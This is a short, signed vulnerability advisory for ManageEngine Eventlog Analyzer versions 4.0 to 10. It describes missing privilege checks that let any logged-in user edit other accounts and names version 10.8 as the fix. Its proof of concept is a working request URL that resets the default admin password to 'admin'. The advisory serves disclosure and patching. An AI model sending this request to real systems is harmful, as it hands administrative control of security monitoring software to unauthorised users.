-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 # Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation # Exploit Author: @GraphX # Vendor Homepage:http://www.manageengine.com # Version: 4.0 - 10 1. Description: The manageengine eventlog analyzer fails to properly verify user privileges when making changes via the userManagementForm.do. An unprivileged user would be allowed to make changes to any account by changing the USER_ID field to a number corresponding to another user. Testing discovered that the default admin and guest accounts are 1 and 2. Considering the recent similar vulnerabilities discovered in a more current version of a similar product by ManageEngine, it is possible that more versions of the software including current, are vulnerable. According to the vendor this is fixed in version 10.8. 2. Proof of Concept -login as an unprivileged user -Use the following URL to change the admin password to "admin" http:///event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin 3. Solution: Upgrade to 10.8 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJWr4qsAAoJEGoTpzhfiAPxDvwQAKjV4QxOQXnC+LReaCtBBx/7 aZ8YVTrVZbWlvWoQsvksYmF5HRgQsD91pSYhbQ2IkPVGiDnl8MwTek8fnv7p62Ep 7ZL3sv+QB2IRi73TW3uE32rD5LBikv9qrVQfnr8uI8xM+HRjX347gABYVp7TAyFq nq6oWT9ngdEgBMDb0x4tlCRSvodaWygeD+xOy3Pb/HlpZBMnwrvKwiRxSbvDKQw9 kM3P3uVcRIVFLaFaEMJUrWc/iliCLPaKbd9IDXoVp4tBoFj6uMNSdR8VeIDWQg5A +RQH0oAsx1wqJOY02BpDXkMAEAIeXH1TEFz5vOvpTubLxC34aFHabLCMWjdCc0aK +lE9HZLfzwRADo5KtdQAmiLjlllNsOuf58MUjtdGr+ODqyDjoJOoZcqm5RUfe0M4 EGpT0+6Xo6pWJMfM6fOnZT9OZd8hLac30Dz4GQTjFncSpVsMs9ED6NMHh4+nQiAk r991kL4SyjF7YDV+rG86fvbWOfNpWrHZb/yLwAvAp7OtZBkDFmwoTPVtVSJHJ9N2 zQR4ufM0UnqVa3zKMzplngVnASStmg9HY4hxH8sUm7NYMq2ULimz1xTvg2jYoxWZ Fp9JsEdiT/vdCWhqBthR4B3rVc/EtDasDHdzGHvp60HihAaF9GBG7RmgHUc13lp9 UAk1W7ydKCcFdw1HHFfL =RJuV -----END PGP SIGNATURE-----